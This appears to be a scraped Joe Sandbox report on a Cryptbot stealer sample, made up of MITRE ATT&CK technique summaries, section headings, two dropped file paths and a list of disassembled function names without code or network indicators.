Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lkOawAWJRO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\FuLvJKHyBveQGVRTqGwm.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
lkOawAWJRO.exe

Function 6C2114B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 006C116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 006C15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C229C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 006C81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 006C8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 006C13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 006C11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 006C1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C229B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 006C1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 006C13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C22B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C22B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON